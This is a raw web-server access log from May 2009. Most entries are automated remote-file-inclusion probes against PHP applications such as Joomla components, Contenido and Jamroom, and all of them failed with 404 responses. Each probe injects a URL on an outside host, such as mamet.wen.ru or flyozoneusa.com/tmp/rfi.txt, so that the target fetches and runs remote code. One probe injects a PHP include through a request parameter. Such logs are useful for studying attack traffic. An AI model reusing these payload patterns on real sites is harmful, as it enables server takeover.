85.214.86.93 - - [16/May/2009:00:23:28 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:00:23:28 -0400] "GET /logs/access_log.Q108121400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:00:23:28 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:00:23:30 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:00:24:38 -0400] "GET /logs/access_log.Q109041300%20%20/index.php?stranica=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
217.18.76.16 - - [16/May/2009:00:25:01 -0400] "GET /logs/access_log.Q108090200//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:00:25:01 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:00:25:01 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:00:25:11 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:00:25:11 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
67.19.228.18 - - [16/May/2009:00:25:16 -0400] "GET /logs/access_log.Q108060200//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
220.128.108.130 - - [16/May/2009:00:25:30 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618; yie8)"
220.128.108.130 - - [16/May/2009:00:25:30 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618; yie8)"
220.128.108.130 - - [16/May/2009:00:25:32 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618; yie8)"
220.128.108.130 - - [16/May/2009:00:25:32 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618; yie8)"
209.59.12.99 - - [16/May/2009:00:25:54 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.84.128.40 - - [16/May/2009:00:25:56 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:00:25:56 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
87.106.135.14 - - [16/May/2009:00:26:03 -0400] "GET /logs/access_log.Q108090200//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:00:26:04 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:00:26:04 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:00:26:05 -0400] "GET /logs/access_log.Q108101000//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
85.214.86.93 - - [16/May/2009:00:26:12 -0400] "GET /logs/access_log.Q108121400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:00:26:12 -0400] "GET /logs/access_log.Q108072400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
88.84.128.40 - - [16/May/2009:00:26:13 -0400] "GET /logs/access_log.Q108090200//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:00:26:14 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:00:26:14 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:00:26:17 -0400] "GET /logs/access_log.Q108090200//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:00:26:18 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:00:26:18 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
72.52.230.168 - - [16/May/2009:00:26:49 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:00:26:49 -0400] "GET /logs/access_log.Q108121400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:00:26:50 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:00:26:51 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
72.30.79.49 - - [16/May/2009:00:26:51 -0400] "GET /logs/access_log.Q108021200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.106.135.14 - - [16/May/2009:00:27:01 -0400] "GET /logs/access_log.Q108101000//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
69.172.92.14 - - [16/May/2009:00:27:15 -0400] "GET /logs/access_log.Q108101000//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:00:27:26 -0400] "GET /logs/access_log.Q108101000//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
67.19.228.18 - - [16/May/2009:00:27:30 -0400] "GET /logs/access_log.Q108060200//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:00:28:30 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:00:28:30 -0400] "GET /logs/access_log.Q108121400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:00:28:30 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:00:28:31 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:00:28:36 -0400] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:00:28:36 -0400] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:00:28:36 -0400] "GET /logs/access_log.Q109012400%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:00:28:44 -0400] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:00:28:44 -0400] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:00:28:44 -0400] "GET /logs/access_log.Q109012400%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
72.30.79.49 - - [16/May/2009:00:28:54 -0400] "GET /logs/error_log.Q108012600 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
110.45.144.106 - - [16/May/2009:00:28:58 -0400] "GET /logs/access_log.Q109022600%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:00:29:00 -0400] "GET /logs/access_log.Q108121400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:00:29:00 -0400] "GET /logs/access_log.Q108072400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:00:29:05 -0400] "GET /logs/access_log.Q109022600%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
196.40.83.75 - - [16/May/2009:00:29:35 -0400] "GET /logs/access_log.Q108112900//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=n%20otice&act=write&no=3&page=&cid=&mode=reply&act=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
213.186.113.5 - - [16/May/2009:00:30:17 -0400] "GET /zboard/view.php?id=artwork_notice&no=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
58.227.193.198 - - [16/May/2009:00:30:36 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:00:30:36 -0400] "GET /logs/access_log.Q108121400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:00:30:36 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:00:30:39 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:00:30:41 -0400] "GET /logs/access_log.Q108122400//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
66.232.102.70 - - [16/May/2009:00:30:41 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
66.232.102.70 - - [16/May/2009:00:30:41 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
217.18.76.16 - - [16/May/2009:00:30:44 -0400] "GET /logs/access_log.Q108090200//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:00:30:44 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:00:30:44 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
66.232.102.70 - - [16/May/2009:00:30:54 -0400] "GET /logs/access_log.Q108082900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
209.59.12.99 - - [16/May/2009:00:30:54 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.214.86.93 - - [16/May/2009:00:31:38 -0400] "GET /logs/access_log.Q109012800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:00:32:07 -0400] "GET /logs/access_log.Q108090100//index.php?option=com_custompages&cpage=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
66.232.102.70 - - [16/May/2009:00:32:07 -0400] "GET /logs/access_log.Q108111500//index.php?option=com_custompages&cpage=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
66.232.102.70 - - [16/May/2009:00:32:07 -0400] "GET //index.php?option=com_custompages&cpage=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
66.232.102.70 - - [16/May/2009:00:32:07 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
193.221.119.126 - - [16/May/2009:00:32:30 -0400] "GET /logs/access_log.Q108121400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:00:32:31 -0400] "GET /logs/access_log.Q108072400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:00:32:34 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:00:32:34 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.230.168 - - [16/May/2009:00:32:45 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:00:32:45 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:00:32:46 -0400] "GET /logs/access_log.Q108082400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
72.32.210.206 - - [16/May/2009:00:32:47 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
72.32.210.206 - - [16/May/2009:00:32:47 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
72.32.210.206 - - [16/May/2009:00:32:47 -0400] "GET /logs/access_log.Q108082100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:00:32:51 -0400] "GET /logs/access_log.Q108121900/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:00:33:15 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:00:33:15 -0400] "GET /logs/access_log.Q108082400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:00:33:15 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:00:33:22 -0400] "GET /errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:00:33:22 -0400] "GET /logs/errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:00:33:23 -0400] "GET /logs/errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:00:33:23 -0400] "GET /errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
193.221.119.126 - - [16/May/2009:00:33:25 -0400] "GET /logs/access_log.Q108121900/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
190.144.44.36 - - [16/May/2009:00:33:29 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
190.144.44.36 - - [16/May/2009:00:33:29 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
190.144.44.36 - - [16/May/2009:00:33:49 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 249 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
190.144.44.36 - - [16/May/2009:00:33:49 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 254 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
66.232.102.70 - - [16/May/2009:00:34:13 -0400] "GET /logs/access_log.Q108111500%20//index.php?option=com_custompages&cpage=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.813"
87.106.135.14 - - [16/May/2009:00:34:19 -0400] "GET /logs/access_log.Q109022600//components/com_simpleboard/image_upload.php?sbp=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:00:34:19 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:00:34:19 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
69.172.92.14 - - [16/May/2009:00:34:20 -0400] "GET /logs/access_log.Q109022600//components/com_simpleboard/image_upload.php?sbp=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
190.144.44.36 - - [16/May/2009:00:34:20 -0400] "GET /errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 208 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
190.144.44.36 - - [16/May/2009:00:34:20 -0400] "GET /logs/errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 213 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
69.172.92.14 - - [16/May/2009:00:34:20 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:00:34:20 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:00:34:26 -0400] "GET /logs/access_log.Q109022600//components/com_simpleboard/image_upload.php?sbp=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:00:34:27 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:00:34:27 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
217.18.76.16 - - [16/May/2009:00:34:31 -0400] "GET /logs/access_log.Q108112400//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
72.52.230.168 - - [16/May/2009:00:34:38 -0400] "GET /logs/access_log.Q109012800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:00:35:24 -0400] "GET /logs/error_log.Q108121400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:00:35:28 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
